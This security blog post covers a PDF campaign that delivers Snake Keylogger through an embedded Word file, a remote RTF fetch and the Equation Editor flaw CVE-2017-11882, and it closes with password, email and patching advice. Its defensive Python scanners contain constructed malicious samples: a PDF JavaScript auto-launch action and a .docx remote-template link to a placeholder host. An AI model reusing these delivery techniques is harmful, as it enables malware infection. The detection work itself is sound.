
Three things you can do to prevent Hackers from Smuggling Malware onto Your Devices


The battle against malware constantly evolves as attackers find new ways to smuggle malicious code onto your devices. Because most people are now wary of opening Word files or spreadsheets from strangers, attackers have turned to a type of file that most people believe to be safe: the humble PDF.

Cybersecurity researchers at HP Wolf Security reported the campaign, which uses PDF files to deliver the Snake Keylogger to vulnerable devices. The attack starts with an email whose subject line is a misspelled version of "Remittance Invoice," tricking the recipient into believing they are about to be paid for something.

The recipient downloads the PDF, secure in the knowledge that PDFs are "safe." Opening it reveals an embedded Word document whose filename has been chosen to begin "has been verified." When the reader asks whether to open the embedded document, its standard warning dialog quotes that filename, so the prompt reads as though the PDF reader itself has verified the document. In reality, the warning exists precisely because files embedded in PDFs, whether docx, xlsx, or JPEG, can carry macros, exploits, or other harmful programs, and the reader has verified nothing.
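The filename trick above can be checked for mechanically. The script below is an added example, not code from the article or from HP Wolf Security: it scans a PDF's uncompressed objects for embedded files, extracts their names, and flags names that read like a sentence or contain reassurance words, along with auto-open, JavaScript and launch actions. Both sample PDFs are constructed here; the exportDataObject open action in the malicious sample is an assumed launch mechanism, not something the article describes.

```python
import re

# Constructed sample PDFs (not real malware). MALICIOUS_PDF mirrors the trick the
# article describes: the embedded file's *name* is a sentence, so the reader's
# "The file <name> may contain programs, macros or viruses" warning reads as if the
# document had been verified. The JavaScript open action is an assumed auto-launch
# mechanism, not something the article asserts.
MALICIOUS_PDF = rb"""%PDF-1.7
1 0 obj << /Type /Catalog /Pages 2 0 R /OpenAction 6 0 R
  /Names << /EmbeddedFiles << /Names [(doc) 4 0 R] >> >> >> endobj
2 0 obj << /Type /Pages /Kids [3 0 R] /Count 1 >> endobj
3 0 obj << /Type /Page /Parent 2 0 R /MediaBox [0 0 612 792] >> endobj
4 0 obj << /Type /Filespec /F (has been verified. However PDF, Jpeg, xlsx, .docx)
  /EF << /F 5 0 R >> >> endobj
5 0 obj << /Type /EmbeddedFile /Length 4 >> stream
PK..
endstream endobj
6 0 obj << /S /JavaScript /JS (this.exportDataObject\({cName: "doc", nLaunch: 2}\);) >> endobj
trailer << /Root 1 0 R >>
"""

BENIGN_PDF = rb"""%PDF-1.7
1 0 obj << /Type /Catalog /Pages 2 0 R
  /Names << /EmbeddedFiles << /Names [(invoice) 4 0 R] >> >> >> endobj
2 0 obj << /Type /Pages /Kids [3 0 R] /Count 1 >> endobj
3 0 obj << /Type /Page /Parent 2 0 R /MediaBox [0 0 612 792] >> endobj
4 0 obj << /Type /Filespec /F (invoice-2291.docx) /EF << /F 5 0 R >> >> endobj
5 0 obj << /Type /EmbeddedFile /Length 4 >> stream
PK..
endstream endobj
trailer << /Root 1 0 R >>
"""

LITERAL = rb"\(((?:[^()\\]|\\.)*)\)"   # one PDF literal string, honouring \( \) \\ escapes


def _decode_literal(raw: bytes) -> str:
    if raw.startswith(b"\xfe\xff"):          # UTF-16BE with BOM, as used by /UF names
        return raw[2:].decode("utf-16-be", "replace")
    return re.sub(rb"\\([()\\])", rb"\1", raw).decode("latin-1")


def embedded_file_names(pdf: bytes) -> list:
    """Names of files attached via /Filespec dictionaries (uncompressed objects only)."""
    names = []
    for m in re.finditer(rb"/Type\s*/Filespec", pdf):
        end = pdf.find(b"endobj", m.start())
        window = pdf[m.start(): end if end != -1 else len(pdf)]
        # /UF (Unicode name) is preferred over /F when both are present
        hit = re.search(rb"/UF\s*" + LITERAL, window) or re.search(rb"/F\s*" + LITERAL, window)
        if hit:
            names.append(_decode_literal(hit.group(1)))
    return names


DIALOG_WORDS = re.compile(r"\b(verified|safe|trusted|checked|scanned)\b", re.I)


def looks_like_dialog_text(name: str) -> bool:
    """True if a filename reads like a sentence rather than a name (warning-dialog spoofing)."""
    return bool(DIALOG_WORDS.search(name)) or bool(re.search(r"[.!?]\s+[A-Z]", name))


def scan_pdf(pdf: bytes) -> dict:
    names = embedded_file_names(pdf)
    return {
        "embedded_streams": len(re.findall(rb"/Type\s*/EmbeddedFile\b", pdf)),
        "embedded_names": names,
        "suspicious_names": [n for n in names if looks_like_dialog_text(n)],
        "auto_open": b"/OpenAction" in pdf,                    # something runs when the file opens
        "javascript": b"/JavaScript" in pdf or b"/JS" in pdf,
        "launch": b"/Launch" in pdf,                            # launch action: runs a program
    }


if __name__ == "__main__":
    for label, doc in (("malicious", MALICIOUS_PDF), ("benign", BENIGN_PDF)):
        print(label, scan_pdf(doc))
```

Compressed object streams (common from PDF 1.5 onwards) hide these dictionaries from a byte-level regex, so for real triage use a proper PDF parser or a tool such as pdfid; the point here is which indicators to look for, and that the embedded file's name, not just its content, deserves scrutiny.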

Exploiting a Known Bug

If the Word document is opened outside Protected View (that is, once the recipient clicks Enable Editing), Word contacts a URL that is not on a legitimate Office domain and downloads an RTF (Rich Text Format) file, which is loaded alongside the open document. The RTF contains two "not well-formed" OLE (Object Linking and Embedding) objects carrying shellcode that exploits CVE-2017-11882, a remote code execution (RCE) vulnerability in the Equation Editor component (EQNEDT32.EXE).

Equation Editor is a legacy component that ships with Office and that many people won't even know is installed. It is used to create and edit complex equations and insert them into Word documents and is mainly used by engineers and academics. As its final step, the exploit shellcode decrypts a second, encrypted block of shellcode and executes it; that stage runs an executable called fresh.exe, which in turn loads the Snake Keylogger.
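The two stages described above, a document that reaches out for a second file and an RTF carrying Equation Editor objects, each leave a trace that can be checked before anything is opened. The script below is an added example, not HP Wolf Security's analysis tooling: it lists external http(s) relationships in a .docx (the usual way a Word document is made to download a remote file on open; the article does not say which relationship the real sample used), and it parses RTF \objdata blobs as OLE1 headers to recover the embedded class name, flagging Equation Editor objects and the \objupdate control word that makes Word activate them as the document loads. The sample .docx and .rtf are constructed here, the example.invalid host is a placeholder, and the OLE native data is zero filler, not an exploit.

```python
import io
import re
import zipfile
import xml.etree.ElementTree as ET

REL_NS = "{http://schemas.openxmlformats.org/package/2006/relationships}"


def external_relationships(docx: bytes) -> list:
    """(part, relationship type, target) for every external http(s) relationship in a .docx.

    A TargetMode="External" target in word/_rels/settings.xml.rels (attachedTemplate) makes
    Word fetch that URL when the document opens; document.xml.rels can do the same via oleObject.
    """
    found = []
    with zipfile.ZipFile(io.BytesIO(docx)) as z:
        for part in z.namelist():
            if not (part.startswith("word/_rels/") and part.endswith(".rels")):
                continue
            for rel in ET.fromstring(z.read(part)).iter(REL_NS + "Relationship"):
                target = rel.get("Target", "")
                if rel.get("TargetMode") == "External" and re.match(r"https?://", target, re.I):
                    found.append((part, rel.get("Type", "").rsplit("/", 1)[-1], target))
    return found


def ole1_class_name(blob: bytes):
    """Class name from an OLE1 object header, which is what RTF \\objdata hex decodes to."""
    if len(blob) < 12:
        return None
    fmt = int.from_bytes(blob[4:8], "little")   # 1 = linked object, 2 = embedded object
    n = int.from_bytes(blob[8:12], "little")    # class-name length, NUL included
    if fmt not in (1, 2) or n == 0 or n > 256 or len(blob) < 12 + n:
        return None
    return blob[12:12 + n].split(b"\x00", 1)[0].decode("ascii", "replace")


def scan_rtf(rtf: bytes) -> dict:
    declared = [m.group(1).strip().decode("ascii", "replace")
                for m in re.finditer(rb"\\objclass\s*([^}\\]+)", rtf)]
    embedded = []
    for m in re.finditer(rb"\\objdata\s*([0-9A-Fa-f\s]+)", rtf):
        try:                                     # attackers scatter whitespace through the hex
            blob = bytes.fromhex(re.sub(rb"\s+", b"", m.group(1)).decode())
        except ValueError:
            continue
        name = ole1_class_name(blob)
        if name:
            embedded.append(name)
    return {
        "declared_classes": declared,            # what \objclass claims
        "ole1_classes": embedded,                # what the object header itself says
        "objupdate": b"\\objupdate" in rtf,      # forces the object to activate as the doc loads
        "equation_editor": any(c.lower().startswith("equation") for c in declared + embedded),
    }


# ---- constructed samples (not real malware) -------------------------------------------
def _ole1_embedded(class_name: bytes, native: bytes) -> bytes:
    # OLE1 header: version, format (2 = embedded), class name, empty topic/item names, native data
    return (b"\x01\x05\x00\x00" + (2).to_bytes(4, "little")
            + (len(class_name) + 1).to_bytes(4, "little") + class_name + b"\x00"
            + b"\x00" * 8 + len(native).to_bytes(4, "little") + native)


# An RTF embedding an Equation Editor object that Word is told to update on load.
# The native data is zero filler, not an exploit payload.
SAMPLE_RTF = (b"{\\rtf1\\ansi Remittance attached.\n{\\object\\objemb\\objupdate"
              b"{\\*\\objclass Equation.3}{\\*\\objdata "
              + _ole1_embedded(b"Equation.3", b"\x00" * 32).hex().encode() + b"}}}")


def _build_docx(rels_xml: str) -> bytes:
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("[Content_Types].xml", "<Types/>")
        z.writestr("word/document.xml", "<document/>")
        z.writestr("word/_rels/settings.xml.rels", rels_xml)
    return buf.getvalue()


_RELS = ('<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">'
         '{}</Relationships>')
# example.invalid is a placeholder host, not a real indicator of compromise
REMOTE_TEMPLATE_DOCX = _build_docx(_RELS.format(
    '<Relationship Id="rId1" Target="http://example.invalid/template.rtf" TargetMode="External" '
    'Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate"/>'))
CLEAN_DOCX = _build_docx(_RELS.format(""))

if __name__ == "__main__":
    print(external_relationships(REMOTE_TEMPLATE_DOCX))
    print(scan_rtf(SAMPLE_RTF))
```

Any external http(s) relationship in a document that arrived by email is worth a second look, and any RTF whose OLE1 header names an Equation class is worth blocking outright on a fleet where Equation Editor has been removed, since no legitimate document should depend on it there.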

Microsoft patched this vulnerability in November 2017 and removed Equation Editor from Office altogether in the January 2018 updates, so well-maintained systems are not affected. However, not all administrators keep their systems fully up to date, so many systems may still be vulnerable to this flaw. Interestingly, the flaw is far older than the patch: the vulnerable Equation Editor binary had not been recompiled for 17 years before the fix was issued, so the bug has now existed for roughly 22 years.

What is the Snake Keylogger?

The Snake Keylogger is not a new piece of malware written for this particular campaign. It first appeared in late 2020 and, by July 2021, was being ranked among the top malware threats by security researchers.

The Snake Keylogger is designed primarily to steal credentials. Like any keylogger, it records every keystroke on an infected device. From that stream of keystrokes, it quickly builds up the user's usernames and passwords for shopping sites, social media, and banking apps. Because many people reuse the same password across sites, a single capture can compromise many accounts at once. A threat actor with this information can use it directly for identity theft or fraud, or sell it on dark web markets.

The Snake Keylogger is particularly evasive and persistent, which makes it hard to detect on an infected system and hard to remove even once it has been detected. Underground forums currently offer it for sale at prices ranging from $25 to $100, depending on the level of service the buyer is prepared to pay for.

How to Avoid the Risks Posed by Malware

As with most cybersecurity risks, there are several relatively simple ways to protect yourself from malware. If you don't have the resources to employ cybersecurity experts, there are cost-effective malware and spyware detection products on the market, along with some excellent firewalls. In addition, you can take these three simple steps:

1. Passwords

Most people don't take password protection seriously enough, choosing passwords that aren't strong enough, reusing the same one across multiple sites, or both. Use a different password for every site, mix upper- and lower-case letters, numbers, and special characters (+, =, £, %, etc.), and make each one as long as the site allows; treat twelve characters as the minimum rather than the eight-character floor many sites still accept. Remembering dozens of unique passwords is impractical, so use a password manager. We recommend Bitwarden.

A password manager is not a complete defense, though. Some managers use an auto-type function that sends the password as keystrokes, which a keylogger captures just as it would your typing. Advanced keyloggers like Snake also take occasional screenshots to capture passwords that way, and other malware targets offline password databases to harvest every stored password in one go. Turning on two-factor authentication wherever a site offers it limits what a stolen password is worth.

2. Beware of Suspicious Emails

Being cautious with email attachments is something we should all be doing these days. If you receive an email from an unknown sender, never open any attachments unless you can verify their authenticity. Even when you know the sender, it's good practice to think before opening an attachment, as their email account may have been compromised. Is the email the sort of thing they would usually send? Do they ever send you attachments? If in doubt, get in touch and ask the sender, by a channel other than replying to the email, such as a phone call. At worst, you've wasted a few moments; at best, you've protected yourself from a potentially devastating cyber attack.

3. System Maintenance

The threat reported by HP Wolf Security only works by exploiting an old software vulnerability for which a patch has existed since 2017. You would think that after more than four years, few systems would still be missing it. Unfortunately, that is not the case, and many people go for years without applying maintenance and updates.

If you use a piece of software regularly, set a day each month to check for and install its updates. But don't stop there; your operating system can be compromised too, so enable automatic updates for your OS so that patched vulnerabilities are closed promptly. It might feel time-consuming to wait for updates to run, but the risk of not doing so far outweighs the loss of a few minutes every week or month. The more regularly you run maintenance, the less time each round takes.

Northstarr Recommendations 

The internet can be fun, helpful, informative, and help us be more productive.  However, like everything else, there can be danger lurking there.  The most important thing you can do to protect yourself is take time to learn the Dos and Don’ts of the internet.  Be careful out there, and be good to yourself, and each other. 

To find out more about how we can help, visit our website or give us a call at (888) 767-2210 to set up an appointment.  We look forward to meeting with you!